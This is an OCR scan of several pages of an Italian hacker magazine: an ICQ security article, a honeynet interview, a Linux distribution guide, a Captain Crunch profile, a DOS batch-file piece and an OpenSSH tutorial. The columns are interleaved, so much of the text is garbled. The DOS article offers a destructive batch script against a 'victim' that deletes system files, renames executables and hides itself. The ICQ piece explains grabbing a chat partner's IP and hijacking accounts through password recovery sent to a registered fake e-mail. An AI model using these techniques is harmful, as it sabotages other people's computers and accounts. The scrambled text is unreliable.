ni. Nel corso degli anni molte versioni E' possibile inviare anche messaggi Outlook, ovviamente, è possibile na-
di icq hanno implementato sempre più spoofati, ovvero che paiono provenire scondere l'estensione dei file in modo
opzioni, e ad oggi possiamo addirittu- da qualcuno che in realtà non è colui da distribuire in giro trojan e altre
ra chiamare tramite Voice Over IP un che ce li sta mandando. “belinate”.
utente ICQ. Un altro trucco
Data la sua relativa complessità, a cui pochi pensa-
però, il nostro caro software non è >> I problemi non no quando fanno
esente da problemi di sicurezza. Ini- distrattamente una
ziamo dai semplici attacchi lama: il
finiscono mai... registrazione a
traffico di ICQ viaggia in porte com- qualsiasi servizio ti-
prese tra 1000 e 2000, e viene indiriz- Ma i problemi di ICQ non si fermano po ICQ: molti
zato dal client in base al tipo di richie- qui, e anzi si fanno più seri: tolti i utenti, credendosi
sta (sia essa al server, o una DCC ver- DOS, esistono una quantità di falle di furbi, mettono una
so altri client). Dato il fatto che le ses- sicurezza vere e proprie nel client email falsa all'atto
sioni di chat vengono abitualmente ICQ. della registrazione
gestite (come già detto) in DCC, ci sa- Per esempio, sin dalle prime ver- (tipo pippobubbo-
ranno tante porte aperte quante ses- sioni era possibile utilizzare il client la@libero.it invece
sioni attive di chat. ICQ non consente, della propria). L'e-
tramite le sue opzioni, di conoscere l'IP Dove? ICQ si scarica mail di un utente
di un utente che sta chattando di noi
(e che a cosa servirebbe?).
Ma una sessione diretta implica un
traffico sul nostro modem quanto su
? liberamente all’indirizzo
www.icq.com, sia per PC che
per Mac. Altri software sono
C6 Atlandide, scaricabile
ICQ è ben visibile
ovunque.
Se noi andiamo su www.iol.it, per
esempio, e registriamo pippobubbo-
quello dell'altro utente mediante una da: http:// atlantide.virgilio.it/ la@libero.it (sperando che non sia già
connessione TCP-IP sincrona: in prati- c6/, m I r c, all’indirizzo: stata registrata), e poi andiamo nell’-
ca, per poter parlare con un'altra http://www.mirc.com/, e M s n home di ICQ nella sezione forgot your
macchina, dobbiamo conoscerne l'IP. (se proprio volete fare un password (quella per chi ha scordato
E il nostro OS, infatti, lo conosce: altro fore a Bill): www.msn. la password), mettiamo l'UIN della
basta fare un bel netstat -a dal prompt com. nostra vittima e richiediamo la pass
di Dos durante una sessione ICQ per per email, cosa succede?
ottenere la lista delle connessioni atti- Che il server manda la pass all'e-
ve, quelle attorno alla 1024 sono le ICQ come un vero e proprio WebSer- mail che ha in memoria, che è quella
nostre DCC di ICQ, e l'IP sarà con tut- ver, aprendo cioè in sharing una car- registrata da NOI!
ta probabilità quello dell'utente con tella del nostro PC in cui includere un Quindi attenzione gli errori più stu-
cui stiamo chattando. vero e proprio sito web, la nostra ho- pidi e banali che rischiano di rivelarsi
Conosciuto questo dato, possiamo me page personale, per esempio, i più subdoli.
iniziare la solita sfilza di lamerate: esi- consultabile da altri utenti ICQ me- Esistono numerose altre falle di si-
stono numerosi programmini che in- diante un semplice click. curezza in ICQ e, data la sua popola-
viano i soliti pacchetti forgiati ad arte Bella idea, peccato che utilizzando rità, vi consiglio di studiarne il proto-
per mandare in crash o chiudere con- un bug simile a quello dell'Unicode collo e il funzionamento.
nessioni (nukers e boiate simili). fosse possibile ottenere accesso illegit- Infine, se usate Linux, un consiglio
Se proprio non sappiamo come timo ai dati contenuti sul disco fisso di spassionato: usate Licq, che a parte
trovare l'IP della vittima (magari per- chiunque avesse abilitato tale opzio- qualche piccolo problema di stabilità
ché per un problema di DCC il traffi- ne: in pratica, se la cartella condivisa è ottimo e non soffre di quasi nessuna
co passa tramite il server), sono in gi- è \cartella, era possibile "risalire" il delle precedenti falle. K
www.hackerjournal.it | 21
intervista
rima
p
Antediale! UN UFFICIALE CONTRO I “PIRATI” DELLA RETE
mon
?
Firewall: letteralmente “parete
antincendio”. Insieme di software/
hardware usato per filtrare i dati in
scambio fra reti diverse, al fine di
proteggere un server da attacchi via
Lance Spitzner
rete locale o via Internet. Progetto Honeynet
HJ, grazie alla preziosa collaborazione del sito SecurityInfos
(www.securityinfos.com), ha intervistato in esclusiva Lance Spitzner creatore
del progetto Honeynet (http://project.honeynet.org/)
22 | www.hackerjournal.it
Secondo te, quale sarà il
futuro delle honeynets?
LS: Dubito fortemente che avremo
sponse dopo che una mac-
china che fa parte della
vostra honeynet è stata
PILLOLE
mai dei prodotti commerciali, troppo compromessa? BIOGRAFIA
complessi e costosi. Invece, credo che Il processo di incident response di un Lance Spitzner si
le honeynets saranno utilizzate prin- honeypot è molto differente rispetto diverte ad imparare
cipalmente per scopi di ricerca e di ad un normale processo di incident facendo saltare
intelligence limitandone cosi' l'utilizzo response. i suoi sistemi Unix a
alle Università, agli organi governa- Con un honeypot che ha come unico casa. Prima di questo, era
tivi, alle organizzazioni militari ed ai scopo la ricerca, si vuole conosceree Ufficiale della Forza
gruppi che fanno ricerca nel campo apprendere le tecniche dei cattivi. di Intervento Rapido
della security. Finché le Honeynets Quindi quando un honeypot viene (http://www.enteract.com/~lspitz/
contineranno a dimostrare il loro va- officer.html), dove faceva
lore, sempre più organizzazioni saltare cose di diversa natura.
adatteranno ed utilizzeranno queste E' raggiungibile
tecnologie. a lance@spitzner.net
Il suo libro più noto è “Conosci
Bruce Schneier ci insegna il tuo Nemico” dove Spitzner
che la security è un pro- tratta la minaccia: Script
cesso e non un prodotto; Kiddie.
pensi che potremo mai avere
delle appliances hardware
contenenti un honeypote e FRASE CELEBRE
come potranno essere inte- “Il mio comandante era solito
grate nelle soluzioni di se- dirmi che per difendersi
curity già esistenti? da un nemico, è necessario
Gli Honeypots sono unici in questo, conoscerlo. Questo concetto
hanno molte differenti variabili, di- militare è facilmente
pende da come li utilizzi. Per il 'secu- applicabile al mondo
rity process', il loro valore primario è compromesso, la fase di response è della sicurezza di rete”
riconoscere gli attacchi. Esistono gia' quella di guardare e capire cosa sta
molti prodotti sul mercato che hanno succedendo. Dopo di che viene cattu-
questa funzione comeManTrap, Spec- rato tutto il flusso di dati compresi i SCRIPT KIDDIE
ter, e Smoke Detector. comandie e le chat IRC. Lo script kiddie è qualcuno
E' possibile saperne ancora di più sul Di solito facciamo in modo che chi alla ricerca di una intrusione
valore degli honeypots alla url: compromette l'honeypot ne abbia il facile. Non sono alla ricerca
http://www.tracking-hackers.com controllo fin quando uno dei due se- di informazioni specifiche
guenti criteri non è soddisfatto : non né cercano una particolare
Quali consigli dai a chi possiamo più imparare nulla di nuo- compagnia. Il loro obiettivo
vuole iniziare a specia- vo dalle tecniche dell'attacker ,l'attac- è quello di ottenere i privilegi
lizzarsi nel campo della ker sta attaccando o distruggendo di root nel modo più semplice
sicurezza informatica? dei sistemi non honeypot. Una volta possibile. Per ottenere ciò
Di non iniziare con gli honeypots o le che l'attacco è completo, scriviamo un si concentrano su un piccolo
Honeynets, ma di iniziare a capire le paper tecnico su cosa effettivamente numero di vulnerabilità,
basi. Capire quindi l'hardening di è accaduto. e cercano su tutta la Rete.
una macchina, il networking e come Alcuni di loro sono utenti
funziona il protocollo IP. Dopodiché é Avremo quindi una seconda esperti che sviluppano da soli
possibile guardare a tecnologie come edizione del best seller i propri strumenti software
i firewalls, gli IDS, gli honeypots, e la Know your enemy? (tools) e si lasciano dietro
encyrption. Uno dei miei posti prefe- Sicuramente! Il nostro team inizierà sofisticate "porte di servizio"
riti per iniziare è: http://www.linux- a lavorarci presto. Abbiamo un sac- (backdoors). Altri non hanno
security.com co di materiale da aggiungere.La idea di quello che stanno
tecnologia honeynet sta progreden- facendo e sanno solo come
Ci puoi descrivere il do velocemente e non vediamo l'ora digitare "via" al prompt
processo di incident re- di incominciare! K dei comandi. K
www.hackerjournal.it |23
linux
Pinguino rules!
Mandrake, Debian, RedHat, sono solo alcune delle molteplici versioni di Linux
disponibili: HJ vi aiuta a capire quale può fare al caso vostro…
N
el variegato panorama Linux il ciali di questo sistema operativo, e la sua su RedHat hanno assunto la medesima
primo problema da affrontare, distribuzione si è sempre contraddistinta filosofia, adottandone in parte o in toto
per chi si avvicina per la prima per una semplicità d'uso e di gestione molte caratteristiche. RedHat si rivolge al
volta a questo splendido siste- nettamente superiore rispetto alle più mercato business come all'utenza desk-
ma operativo, è senza dubbio quello di ostiche concorrenti. top: permette infatti di personalizzare in
scegliere la distribuzione più adatta ai Propria di questa distro è infatti una mol- modo piuttosto approfondito la propria
propri gusti e all'utilizzo che si dovrà fare titudine di tools atti a velocizzare e sem- linuxbox, sia che vogliamo configurare
del proprio computer. Com'è noto, Linux plificare notevolmente i vari lavori di con- un web server, sia che utilizziamo il no-
è presente sul mercato in differenti pac- figurazione&gestione del sistema opera- stro fedele pinguino per divertirci in rete
chettizzazioni, ognuna strutturata in mo- tivo, e ad oggi (nel momento in cui scri- o per giocare.
do diverso e comprensiva di diversi tools viamo è disponibile la versione 7.3) il li- Per contro, possiamo muovere a que-
e applicazioni per l'amministrazione, la vello di automazione raggiunto è note- sta celeberrima distro un paio di critiche
configurazione, l'editing, lo sviluppo etc... vole, in particolar modo per quanto ri- riguardo la sicurezza e la stabilità dei
Ma a quale distribuzione sacrificare il guarda tutti quei fastidi che in genere de- pacchetti installati: è capitato che RedHat
proprio tempo e le proprie energie? Ad rivano dal dover convincere il nostro PC distribuisse versioni non proprio "graniti-
oggi possiamo disporre di una moltitudi- che quella che abbiamo appena colle- che" della propria creatura, soggette il
ne di differenti soluzioni, a seconda che le gato non è una stampante ma una mac- più delle volte a seri problemi di sicurez-
nostre esigenze siano meramente "casa- china fotografica digitale: ad oggi il rico- za legati alla precocità dei pacchetti inse-
linghe" o marcatamente professionali. noscimento automatico delle periferiche riti, e, pertanto, per un uso aziendale
Diamo un'occhiata alle più famose distri- e dell'hardware inizia a funzionare dav- (orientato al lato server) di questa distro,
buzioni al fine di orientarci nella scelta di vero alla grande. è consigliabile una massiccia fase di te-
quella più adatta ai nostri bisogni. RedHat si distingue inoltre per aver sting e di aggiornamento.
Tra le distro "stori- introdotto nel mondo Linux i celeberrimi Tra le "figlie" di Red-
che" di Linux, Red- pacchetti rpm, mediante i quali l'installa- Hat, quella più fa-
Hat è senza dubbio zione di nuovo software si è resa netta- mosa e diffusa è
tra le più consolidate e supportate: Red- mente più semplice che in passato; a senza dubbio Mandrake: rivolta ad una
Hat è stata infatti una delle primissime conferma della bontà commerciale di utenza prevalentemente casalinga, è in
società a intuire le potenzialità commer- questa scelta, molte distribuzioni basate assoluto la distribuzione Linux più sem-
24 | www.hackerjournal.it
be your server today! >>
plice da installare e configurare, e anche
quella più "user friendly".
Ciò è evidente sin dalla fase di instal-
giunte da Slackware, anche se ultima-
mente le voci di chi la considera una dis-
tro troppo "abbandonata a se stessa" ini-
DOWNLOAD
lazione: un ottimo tool di partizionamen- ziano a farsi insistenti.
to del disco solleva l'utente dalla necessi- Oltre a queste distri- DEBIAN
tà di preparare preventivamente una buzioni, sicuramente http://www.debian.org/
partizione per il nuovo sistema operativo, tra le più famose, ne La Debian è una delle
nel caso sulla macchina sia già installato esistono molte altre: possiamo breve- distribuzioni piu'
un altro S.O. (come windows), e la sem- mente parlare di Suse, distribuita com- conosciute, con più di 1500
plicità di configurazione dell'hardware in mercialmente da una omonima società pacchetti software
molti aspetti surclassa qualsiasi altro tool. tedesca, che si distingue per la sempli- precompilati e pronti
Sempre in fase di installazione sarà cità di installazione e per le sue doti di per essere installati
possibile scegliere quali applicazioni an- stabilità e sicurezza. sulla propria macchina.
dare a installare, dai giochi ai vari tools Una nota di merito a Madeinlinux,
dedicati allo sviluppo. Ultimamente, una distribuzione interamente sviluppata LINUX APPLICATIONS
Mandrake inizia a rivolgersi marcata- in Italia, che tenta di localizzare in modo http://www.linuxapps.com/
mente anche al mercato server, imple- molto marcato Linux nel nostro paese: il Lo slogan è "Se non riesci
mentando nelle ultime relase una quan- lavoro svolto dai ragazzi di MLX S.r.l. è a trovarlo qui, non lo
tità di roba tra webserver, ftpserver etc... ancora affetto da qualche pecca (in par- troverai da nessuna
Mandrake è probabilmente la miglior ticolar modo per quanto riguarda il lato parte!"...
soluzione per l'utenza domestica, ma già server) ma la strada è quella giusta, ed è
oggi molti aspetti di questa distro rendo- motivo di orgoglio avere finalmente una LINUX FAQ & NEWS
no quantomeno consigliabile darle distribuzione "nostrana" in luogo delle http://www.pippo.com/linux.html
un'occhiata anche dal lato server. solite (e a volte pessime) traduzioni da al- Un appassionante elenco
Parlando di distribu- tri distribuzioni. di domande e risposte
zioni orientate al bu- Oltre a quelle esposte, esistono mol- in italiano relative al Linux
siness, una delle più tissime altre distro Linux, ognuna con le e al mondo che gli gira.
famose e sicuramente delle più stabili e proprie caratteristiche, i propri pregi e i
sicure è senza dubbio Debian: sviluppa- propri difetti. Il consiglio è: provatene LINUX GAMES
ta negli anni interamente utilizzando soft- quante più potete e cercate quella che http://www.linuxgames.com/
ware open source, è ad oggi tra le distro meglio soddisfa le vostre esigenze sia di A volte anche i pinguini
più apprezzate dagli "addetti ai lavori". Le S.0 che di lavoro. K hanno bisogno di divertirsi.
sue qualità nascono da un progetto to-
talmente free: le scrupolose fasi di test Sono disponibili diverse distribuzioni LINUX IN ITALIA
che accompagnano ogni sua relase han-
no reso Debian una tra le più solide dis-
tribuzioni di Linux, anche se l'utente neo-
fita potrebbe trovarsi spaesato dall'as-
? di Linux, alcune a pagamento come
Red Hat, altre gratuite come Debian
che è sviluppata da un gruppo di
volontari che fanno ricerca, finanziati
http://www.linux.it/
La community italiana.
LINUX ON LINE
senza quasi totale di tools grafici atti a da Enti commerciali. http://www.linux.org/
configurare l'hardware. Informazioni, curiosità
Addentrandoci sem- e link sul pinguino.
pre più tra le distribu-
zioni orientate ai pu- RED HAT
risti, arriva inesorabile Slackware: tra le ULTRACOMPATIBILE http://www.redhat.com/
prime distribuzioni ad apparire, è quella Distribuzione di Linux
maggiormente "pulita". ! Contrariamente a quanto si è a pagamento. K
Non c'è interfaccia grafica, tutti gli or- soliti sentire, Linux non è affatto un
pelli vari girano al largo da lei e sono sistema operativo complesso da
bandite forme di pacchettizzazione del utilizzare, e non ha nulla da
software tipo .rpm e .deb: Slackware se- invidiare, in termini di produttività, a
gue stoicamente l'antica scuola del tgz. Windows 98, NT o MacOS. La
Se da un lato Slackware rimane apprez- compatibilità tra i vari mondi è
zatissima dagli utenti più smaliziati e dai garantita dall'Os stesso, basta infatti
puristi, essendo quella che più delle altre pensare che un pc con installata
incarna la filosofia open source, è pur una recente versione di Linux è in
vero che, ad un utente neofita e che de- grado di comunicare con reti
sideri avvicinarsi per la prima volta a Li- Novell, Os2, Microsoft ed AppleTalk;
nux, questa distribuzione chiude le porte quanto alle applicazioni, poi, vi
in faccia. sono centinaia di programmi per
Ciò nonostante sono da encomiare le l'office automation, la grafica, il web
caratteristiche di stabilità e sicurezza rag- publishing, e via discorrendo.
www.hackerjournal.it | 25
linux
PARTIZIONE, QUESTA
SCONOSCIUTA
! Immaginate il vostro disco fisso
come una torta. Ogni fetta che facciamo
di quest'ultima può essere intesa come
una partizione, una sezione della
superficie di memorizzazione dei dati.
Per partizionare un disco esistono diversi
strumenti, liberi come fips e fdisk, che
possono essere scaricati liberamente da
Internet, oppure sono disponibili
software commerciali che rendono
l’operazione estrememanete semplice ed
intuitiva, alla portata di tutti.
26 | www.hackerjournal.it
miti & leggende
Captain Crunch:
un fischietto per amico
Nel primo numero abbiamo dedicato qualcosa come sei righe
al precursore di tutti gli hacker moderni: un trionfo! Era quindi
ovvio che decidessimo di raccontarvelo in modo approfondito
J
l’FBI, mentre i suoi “colleghi" sono alla sofisticatissima e famosa
ohn Draper, alias Captain sempre rimasti al sicuro, più defilati. Blue Box, un marchingegno capace
Crunch, è stato il primo hac- Ed infatti Draper nel bene o nel male di imitare i segnali tipici
ker che la storia ricordi. Ma- ha continuato la sua vita da “zingaro“ delle linee di commutazione.
gari non il primo assoluto. dell’informatica mentre i suoi coeta- Così finì per interessarsi
Sicuramente il più geniale. nei si accomodavano in dietro a co- anche l'FBI e Captain Crunch
La storia è abbastanza no- mode scrivanie di palissandro con venne arrestato negli anni
ta, Draper, in pieni anni ’70, aveva poltrona in pelle incorporata. Ha par- Settanta.
scoperto che un fischietto trovato al- tecipato, insieme all’amico Jobs alla
l’interno di una scatola di cereali, o nascita di Apple, ha sviluppato i primi PHONE PHREAKING
patatine a seconda delle versioni, videogiochi e per lungo tempo ha sta- Col passare degli anni
emetteva un suono con una frequen- zionato in India cavalcando l’onda e con l'avvento dei chip DSP
za pari a 2600 Hertz in grado di della controcultura degli anni ’70. il phone phreaking passa sui
sbloccare la linea del sistema telefo- Sembra che come animale dome- computer e le blue box diventano
nico americano e di ottenere il se- stico abbia un alligatore, che tiene programmi software che generano
gnale libero per chiamare in ogni an- nella vasca da bagno. Una scelta e inviano i toni desiderati.
golo del pianeta.I cerali o patatine perfettamente in linea con il suo stile Ancora oggi si segnalano 150mila
che dir si voglia, avevano un nome di vita. Le notizie più recenti del “no- attacchi ai telefoni pubblici,
piuttosto divertente Captain Crunch, stro capitano” tuttavia lo danno co- solo a New York mentre phone
che è diventato a pieno titolo il so- me prossimo al salto della barricata. phreaker di tutto il mondo
prannome di Draper. Draper dopo Sembra infatti che aiuterà i siti di si ritrovano periodicamente
aver utilizzato la tecnica del fischiet- grosse società a difendersi dagli at- sulle linee per chiacchierare.
to, ha messo a punto un sistema più tacchi dei pirati della rete. Ma il mito
complesso e efficace per chiamare a rimane. K FONTI
sbafo ovunque: Bluebox. Un dispositi- In Cyberpunk, antologia di testi
vo che consentiva di accedere ai nu- Blue Box: permetteva di attivare i politici, ed.Shake, 1990;
meri verdi per incanalare le chiama-
te in qualsiasi direzione. Secondo le
leggende John Draper utilizzando
? codici di controllo delle linee
telefoniche analogiche e effettuare
telefonate gratuitamente.
Paul Mungo e Bryan Glough,
Approaching Zero, Random House,
1992. K
www.hackerjournal.it |27
PRATICA
vs.
Dos è l’archetipo del sistema operativo, è alla base di Windows, ma può essere
usato anche per “terminarlo”…
M
olti pensano che e il buon che potrà eseguire tutti i comandi a MD <nomecartella> crea una cartella
vecchio Dos sia ormai inu- vostro piacimento.
tile... Ma chi smanetta con Copiatevi il vostro file AUTOEXEC.BAT RD <nomecartella> cancella la cartella
i PC sin da quando ha 5 da qualche parte sull'hard-disk (non
anni (il mio caso :D) e modificate né eliminate quello di DEL <file> cancella il file
quindi ha usato Dos, sa sistema perché questo file è di fonda-
benissimo tutti i suoi limiti e tutti i suoi mentale importanza per Windows). COPY <file> copia un file in una
vantaggi... Schiacciando col tasto destro, e directory o in un altro file
Quante volte avete pensato: "ora a andando su “modifica” verrà aperto il
quello gli “frittello il PC...!". Ma poi notepad che conterrà qualche stringa DIR visualizza file
quando era ora di agire non sapevate di comando.
come fare. Bene, Il Dos è di grande Quelle sono alcune operazioni che DIR/p visualizza file in più pagine
aiuto in questi casi. il PC esegue alla sua accensione.
Se non sapete programmare, non Cancellate tutto il contenuto e ora RENAME rinomina un file
usate virus per paura di infettarvi, Dos avete un file bat pulito da editare
può fare al caso vostro. come volete. FORMAT <disc> Formatta il disco
Ma cominciamo col dire cos'è Dos Il Dos non è molto sicuro. Come
(qualcuno non lo sa???). E’ il primo saprete se si prova a cancellare un file Ma entriamo nei particolari... Ora
sistema operativo di casa Microsoft, di importanza vitale per Windows, da vi spiegherò come fare determinate
non ha nulla di visuale, ma conoscen- Windows, questo ci avverte e non ce cosuccie: D.
do alcuni comandi si può fare di tutto. lo fa eliminare. Ma questo discorso Per cominciare, ogni file deve iniziare con:
Dos è il padre di Windows, e anche se non vale col Dos!! Se ad esempio nel
ad alcuni può sembrare strano file bat scriviamo: --> @echo off
Windows usa ancora molto Dos...
-->delc:\windows\command.com A che serve?
Con @echo off l'utente non vedrà il
>> Si comincia salviamo il file e lo apriamo. Il file bat comando appena eseguito.
cancellerà il file command.com della
Quasi tutti voi macchina e al prossimo riavvio il PC Cioè?
avrete sentito par- non partirà! Se io faccio un file che entra nella car-
lare del celebre file E questo è un piccolo esempio, un tella c:\prova\ scriverò:
AUTOEXEC.BAT, file bat può formattare l'hard disk, can-
presente in tutti i cellare dati, copiare dati. --> @echo off
sistemi di casa --> cd prova
Microsoft. Quello
è un esempio di >> I comandi principali e apparirà:
file bat. Un file bat
non è altro che un file che esegue una Questi sono comandi base di Dos, --> c:\
serie di comandi Dos in successione. anche se ne esisotno molti altri. --> c:\prova\
Con un qualsiasi editor (usate note-
pad!) si può modificare un file bat, CD <nomecartella> entra nella cartella Se invece non dovessi mettere
28 | www.hackerjournal.it
>>
@echo off apparirebbe sulla nostra il sistema della vittima e non voglio che --> type XMSXXXX0 > c:\win-
schermata: sia visibile e modificabile scriverò: dows\himem.sys
--> ATTRIB nomefile.bat +H +R Il file dovrebbe venir riempito di carat-
--> c:\ teri inutili fino ad occupare quantità
--> c:\cd prova Il comando COPY enormi.
IL COMANDO DA ME ESEGUITO! Questo comando è molto flessibile e Un esempio molto dannoso:
--> c:\prova\ permette le seguenti operazioni:
--> @echo off
Quindi se volete cancellare un file a --> copy file.estensione c:\nome- --> del c:\autoexec.bat
qualcuno e questo ci capisce un po' di cartella\<--> copierà il file nella --> del c:\config.sys
Dos dovrete per forza usare il coman- cartella --> rename c:\*.exe *.hacked
do @echo off perché se no lui si vedrà --> del c:\windows\win.*
apparire ---> del c:\nomefile.estensio- --> copy file2.estensione+file1. --> del c:\windows\system.ini
ne e se ne accorgerà subito! estensione<--> sostituirà al file2 il --> rename c:\windows\*.exe
Analogamente il comando echo file1 c:\windows\*.hacked
può servire a far visualizzare delle scrit- --> del c:\command.com
te. Per esempio se scrivo: --> copy file1.estensione+file2. --> del
c:\windows\command.com
--> type XMSXXXX0 > c:\win-
dows\himem.sys
www.hackerjournal.it | 29
Sicurezza
U
no dei maggiori pericoli della rete >> Ssh1 e Ssh2 \----> AuTeNtiFiCazIOnE <----/
è lo sniffing, una delle tecniche più
usate dai cracker per ottenere user- La Ssh1 è la più vecchia, la Ssh2 è una Quando un utente tenta di collegarsi ad
name e password validi per acce- completa riscrittura della vecchia versione ed un sistema remoto, l' autentificazione può
dere ai sistemi che vogliono violare. Con la è più sicura. Noi comunque ci occuperemo avvenire in diversi modi:
tecnica dello sniffing gli eventuali malinten- della priva versione...
zionati si pongono in ascolto sulla nostra re- * RhostsAuthentication
te ed intercettano tutti i pacchetti in transito, \----> InIzIam0 <----/ Prevede che se il sistema da cui l'utente ten-
alla ricerca di username e password tra- ta il collegamento è elencato in uno dei file
smessi in chiaro. Se la vostra rete nn è sicura Ogni host su cui è installato ssh possiede /etc/hosts.equiv, /etc/ssh/shosts.equiv, $HO-
o volete collegarvi ad un server Unix che è su una coppia di chiavi RSA (un algoritmo di ME/.rhosts, $HOME/.shosts, l'accesso è con-
una rete diversa dalla vostra, per evitare il crittografia a chiave asimmetrica) lunghe sentito senza password. Poiché questo meto-
pericolo dello sniffing, conviene effettuare 1024 bit, una pubblica ed una privata. In do comporta una scarsa protezione verso i
connessioni criptate... Secure Shell (ovvero più, ogni utente che utilizza ssh può opzio- tentativi di spoofing, esso è disabilitato per
Ssh) è il modo migliore per criptare le vostre nalmente generare una propria coppia di default.
connessioni verso altri sistemi e poter naviga- chiavi RSA. All'atto della connessione, il ser-
re tranquilli. Con ssh è possibile effettuare il ver comunica al client due chiavi pubbliche: * RhostsRSAAuthentication
tunnelling di connessioni x11 o di altre appli- Questo metodo è la combinazione tra la
cazioni che lavorano su particolari porte, in * una fissa di 1024 bit che è la vera e pro- precedente ed una autentificazione basata
modo che esse lavorino in modo sicuro! pria chiave dell'host //// su sistema RSA. In pratica l'accesso è con-
* l'altra di 768 bit che viene rigenerata ogni sentito dai file /etc/hosts.equiv ,
Questo protocollo risolve inoltre alcuni ora //// /etc/ssh/shosts.equiv , $HOME/.rhosts ,
"grossi" problemi di sicurezza dei protocolli $HOME/.shosts e inoltre è presente
TCP/IP come lo spoofing : Il client allora genera una sequenza casuale nel file /etc/ssh_known_hosts oppure $HO-
di 256 bit (challange) e la codifica con le ME/.ssh/known_hosts la chiave ke
IP spoofing ----> falsificazione dell'indirizzo chiavi pubbliche del server. Da questo mo- identifica il client che sta tentando la connes-
IP del mittente mento in poi la connessione viene crittogra- sione,allora l'accesso è consentito.
DNS spoofing ----> falsificazione delle infor- fata con uno degli algoritmi a chiave sim-
mazioni nel DNS metrica supportati da ssh (IDEA, DES, * RSAAuthentication
Routing spoofing ----> falsificazione delle 3DES,ecc..) e si passa alla fase di autentica- Questo metodo si basa sul sistema di chiavi
strade intraprese dai pacchetti zione. pubbliche e private Rsa. Ad ogni
30 | www.hackerjournal.it
>>
la sua installazione e configurazione sulla [root@root]$ ssh host.dominio.it
nostra linux-box. In questo articolo utilizze-
remo OpenSSH (www.openssh.com), In questo modo si tenta la connessione
una versione free di ssh,compatibile con i con l'utente di default del client.
2 protocolli ssh1 e ssh2. Per collegarci con il nostro utente:
Per poter usare openshh nel vostro si-
stema serve che sia già installato OpenSSL [root@root]$ ssh utente@host.dominio.it
(www.openssl.com) e le librerie Zlib oppure
(www.gzip.org/zlib/). [root@root]$ ssh host.dominio.it -l utente
DNS: Domain Name Server Tutti questi software sono disponibili sia in [root@root]$ scp /home/vicio/ssh.txt
[root@root]$ scputente@host.dominio.it:
utente sono associate due chiavi utilizzate [root@root]$ tar xfvz pakketto.tar.gz /nfzcrew/tutorial/ssh.txt/home/vicio
per l'autentificazione,una pubblica (imma- [root@root]$ cd pakketto
gazzinata nel file $HOME/.ssh/identity.pub [root@root]$ ./configure Per personalizzare il funzionamento di
) ed una privata ( immagazzinata nel file [root@root]$ make && make install ssh è possibile modificare alcuni file di
$HOME/.ssh/identity ).In fase di autentifica- configurazione. In particolare, per modi-
zione il client fornisce la chiave pubblica Una volta installato openssl e le librerie ficare le opzioni del client ssh il file da
con la quale tenta il collegamento. zlib possiamo procedere alla installazione di modificare è /etc/ssh/ssh_config.
Il server controlla all’interno del file openssh. Se utilizziamo il pacchetto rpm il la- Modificando questo file si potrà cam-
$HOME/.ssh/authorized_keys che sia pre- voro sarà semplificato, noi useremo il tar.gz biare le modalità di funzionamento del
sente la chiave inviata dal client, in tal ca- client per tutti gli utenti. Se si vuole per-
so, invia al client un challenge (un nume- [root@root]$ tar xfvz openssh-2.9.tar.gz sonalizzare il client per ogni alcuni utenti
ro casuale,criptato usando la chiave pub- [root@root]$ cd openssh-2.9p2 basterà copiare il file nella home di cia-
blica del client ). Il client decripta il chal- [root@root]$ ./configure --sysconf scuno di essi, e più precisamente in
lenge con la chiave privata dell'utente,e ne dir=/etc/ssh $HOME/.ssh/ssh_config procedendo poi
da comunicazione al server, dimostrando [root@root]$ make la sua modifica.
così di avere la chiave privata,così l'utente [root@root]$ make install Se si vuole modificare il funzionamen-
può accedere senza password . [root@root]$ make host-key to del demone sshd il file da modificare è
/etc/ssh/sshd_config.X esempio se si vuo-
* Password Con il comando `--sysconfdir` dicia- le togliere l'accesso all'utente root tramite
Se nessuno di questi metodi esposti ha suc- mo ad ssh di utilizzare come directory x i ssh, basta aggiungere a tale file la stringa
cesso , l'autentificazione viene effettuata con file d'installazione /etc/ssh anziché quella
la richiesta all'utente di una password,che di default /usr/local/etc. PermitRootLogin no
viene comunque criptata . Con il comando `host-key` creiamo le
host keyRSA e DSA. A questo punto per Openssh è uno strumento molto fles-
provare il tutto basterà lanciare il demone sibile, per imparare ad usarlo al meglio
>> Installazione e con- sshd con il comando: leggetevi la sua documentazione.
figurazione di Ssh Se volete un sistema "sicuro" avrete
[root@root]$ sshd start fatto il primo passo… K
Dopo aver trattato gli aspetti teorici su cui Per collegarsi ad un sistema remoto con Lordvicio
si basa ssh,vediamo come procedere per Ssh utilizziamo il comando: lordvicio@hotmail.com
www.hackerjournal.it | 31